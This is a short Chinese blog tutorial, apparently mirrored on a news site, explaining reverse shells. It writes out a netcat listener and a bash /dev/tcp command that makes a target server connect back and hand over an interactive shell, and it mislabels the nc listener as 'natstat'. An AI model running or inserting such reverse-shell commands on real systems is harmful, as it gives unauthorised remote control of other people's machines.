当前位置: 首页 > news >正文

记一次反弹shell的操作【非常简单】

news 2025/7/18 3:31:55

#什么是反弹shell
通常我们对一个开启了80端口的服务器进行访问时,就会建立起与服务器Web服务链接,从而获取到服务器相应的Web服务。而反弹shell是我们开启一个端口进行监听,转而让服务器主动反弹一个shell来连接我们的主机,我们再通过接收到的shell进而来远程控制服务器。

在这里插入图片描述

反弹shell命令

首先本地进行监听:
主要是用natstat命令(也可以利用程序监听)
nc -lk 35436
在这里插入图片描述
从被攻击服务器上发起命令如下:
bash -i > /dev/tcp/{你的ip}/{你监听的端口} 0>&1 2>&1
例如:
bash -i >/dev/tcp/192.168.0.46/35436 0>&1 2>&1
在这里插入图片描述
我们的主机就会自动登录到远程机器的bash上
在这里插入图片描述

http://www.lryc.cn/news/149961.html

相关文章:

  • 如何排查 Flink Checkpoint 失败问题?
  • lazarus(pascal)和c语言读日志文件筛选保存为新文件
  • 学习JAVA打卡第四十九天
  • Golang数据结构和算法
  • python 装饰器
  • iOS如何获取设备型号的最新方法总结
  • SpringBoot之RestTemplate使用Apache的HttpClient连接池
  • 第49节:cesium 倾斜模型osgb转3dtiles,并加载(含源码+视频)
  • 零信任安全模型详解:探讨零信任安全策略的原理、实施方法和最佳实践,确保在网络中实现最小特权原则
  • 01_nodejs简介
  • 企业架构LNMP学习笔记4
  • 探索UniApp分包
  • uniapp 支持图片放大
  • Oracle数据泵备份恢复(导出导入)详细语句
  • 【JS案例】JS实现积分抽奖(内附源码)
  • angular抛出 ExpressionChangedAfterItHasBeenCheckedError错误分析
  • 动态链接库的__declspec(dllexport)关键字的概念
  • 群晖NAS:DS Video、Jellyfin等视频电影电视剧海报、背景墙搜刮器
  • WEBGL(3):鼠标动态绘制点
  • Sass基础
  • Java中的消息队列有哪些?
  • 多维时序 | Matlab实现GRU-Adaboost和GRU多变量时间序列预测对比
  • 测试用例编写规范参考
  • unity3d:功能验证,收集开源项目的工程合集
  • plotly_beforehover 用法:
  • 利用 AI 赋能云安全,亚马逊云科技的安全技术创新服务不断赋能开发者
  • 18. 填坑Ⅰ
  • CSS 实现平面圆点绕椭圆动画
  • docker login : x509: certificate signed by unknown authority
  • 金蝶云星空二开,插件查看工具